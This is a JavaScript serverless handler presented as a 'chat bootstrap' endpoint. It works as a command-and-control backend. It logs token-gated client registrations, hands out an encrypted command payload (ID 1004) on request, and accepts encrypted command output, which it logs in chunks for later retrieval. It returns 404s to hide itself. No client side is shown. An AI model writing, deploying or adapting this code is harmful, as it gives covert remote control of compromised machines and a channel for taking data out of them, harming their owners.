import crypto from 'node:crypto';

const BOOTSTRAP_TOKEN_SHA256 = '54362ebffcdb80f0242d930ed17b5193eaf734a2068eea34de9b7d194b878fcc';
const CONTROL_ID = '1004';
const CONTROL_PAYLOAD = 'U2FsdGVkX194pXjA6QDYz4fLv1j2hsS9XiVwjP+AH1kLgjk/pXMVNPJno5y6TWRexLHvdczJFM0QSiIIVaoezouboJ0kStJZbr1hsY4HV60aqmeeIkCsmpcgw2Ad6X1U11XVBempkTTxJUKPgsBq4KOgWPP32rzSnnsZwjt2FzjBi5/JuGmgb0P1SlwLr7SFr7puxBhXsqIinp5WJC1F04D//2RfVgyVilFNJ2sk50GA720DDR1BZCj7Mtom2H8niPvPN1eBdZmVxKgq3UFSzSGvN/LKVsnTbVR/WsTdf3rsVplCCdfcq6/sTkF5ZYSTJEtjoeUUofsZfCr3xZnneH71QjungqfzjmW8ON2FwplO033YVHFxYiwJEsGVmkujlileUFPYV3wHvQ03TefrnvacnYzRoHpA8BHObqvu+gFCSijmVeO3n2vqbqDcDbsN3D6+iJcueyvWRI1mXpjQAi6peqDrHm8sv8Z/qHvEXR30A/EH6H0570GzOTlU1uP8bWqSYAf99cX4EqE8WfnaJLn476+wRWkhAGKNfWJ9d40S5qGjyrMjfWuSG+a24Cmt/zNo/Rw7HgHU61zWNgcBl+5s53HGqagxWAJSUAstByV0UL6pqLHjmyJmY2HGO+rkOjzWg8UsbzRGgVqCCFO2hN9daxz5u2n1eIGNQB+4lqqxK5iXNPmk1RsUAe2h0J/XmdIrRF6f2H1+eUi1fhEBkQE4vMlJ1osjUVTAC74XfXutLuXtcib6FKqoXE2V6q7WQsFjw47SbWAwcodI173PgNccr5/c2CpDP1NL1D9DaIn3/nA+ZJ19MP9HEOqw4uC+Co2YJkMYOU5F/N7t2IgOqWObFW8N2FpGASt8VlICGPN/dL6z1xM4wVC8CTtbVi+rbiRxtq9VM2UGCSXLnEZXiIGYok0YH7lOcmdRYx4M+lS1Ut3zm19/d9ZlJk02POBIDZ06BAkMTSDrrYnNTz4Bm9zhjPDyENqK4uD4Sx3CFtFN+MOol1JSmZ5BnNYmpACGjFm3SxXzNwFEJGw1/M4KGmxQGZ2kK4ZNsrF6Yqj15FiGkpz6mWJKHoNR/M4FAvZVKWSftEi/i+uRFUaxNP3IvDCMAb/Jbb6L6/e5stqKIxGvs1UmY0SegqG7P/d1HY07i2kh027Ukjk3KVtBWVzZtRSbMZlLAyR/M85EfqBhsFv1lC26O+1YKEPQIRp4Qku0ldAjEM01qlLTN3RphgevUyqOZKijrABWj6cWBc8hC5l6dx2p4g826GHeTuVJnZg0/sluWB0J9zFOpcz5ksqp+Rxy8AVPlKoTvQxWlpcoQBcPJWpugQDEcuNJRVdMBHujo3hmKiqvrOF+vglbUpZxFDqUDvjcH0XaGiiGHR6OnFHUpskf4IBLgd3JHPrgLRI8KDWyWVBQM60g2xBt4Scrfzp+vd6wW68awwB40lYbnDG4/USmNE3nuh0r1eFAlMwn2I2uuWzW3SPuS2Mc3bqiuLXsi23G8lJU7WYS4EdC0HJ6Qgu6St7rGE/4LmfYKN3v';

async function readBody(request){if(typeof request.body==='string')return request.body;if(Buffer.isBuffer(request.body))return request.body.toString('utf8');if(request.body&&typeof request.body==='object')return JSON.stringify(request.body);const chunks=[];for await(const chunk of request)chunks.push(Buffer.isBuffer(chunk)?chunk:Buffer.from(chunk));return Buffer.concat(chunks).toString('utf8');}
function validBootstrapToken(request){const raw=request.headers['x-bootstrap-token'];const token=Array.isArray(raw)?raw[0]:raw;if(!token)return false;const digest=crypto.createHash('sha256').update(String(token)).digest('hex');const a=Buffer.from(digest,'hex');const b=Buffer.from(BOOTSTRAP_TOKEN_SHA256,'hex');return a.length===b.length&&crypto.timingSafeEqual(a,b);}
export default async function handler(request,response){const url=new URL(request.url,'https://bootstrap.invalid');const mode=url.searchParams.get('mode');response.setHeader('cache-control','no-store');response.setHeader('x-content-type-options','nosniff');if(mode==='register'){if(request.method!=='POST'||!validBootstrapToken(request))return response.status(404).send('Not found');const body=await readBody(request);console.log(`CHAT_BOOTSTRAP_REGISTER ${body.slice(0,4096)}`);return response.status(204).end();}if(mode==='control'){if(request.method!=='GET')return response.status(404).send('Not found');response.setHeader('content-type','text/plain; charset=utf-8');return response.status(200).send(`${CONTROL_ID}\n${CONTROL_PAYLOAD}\n`);}if(mode==='output'){if(request.method!=='POST')return response.status(404).send('Not found');const body=await readBody(request);const splitAt=body.indexOf(':');const commandId=splitAt>=0?body.slice(0,splitAt):'unknown';const cipher=splitAt>=0?body.slice(splitAt+1):body;const chunkSize=1800;const total=Math.max(1,Math.ceil(cipher.length/chunkSize));for(let i=0;i<total;i+=1)console.log(`CHAT_BOOTSTRAP_OUTPUT_PART ${commandId} ${i+1}/${total} ${cipher.slice(i*chunkSize,(i+1)*chunkSize)}`);return response.status(204).end();}return response.status(404).send('Not found');}
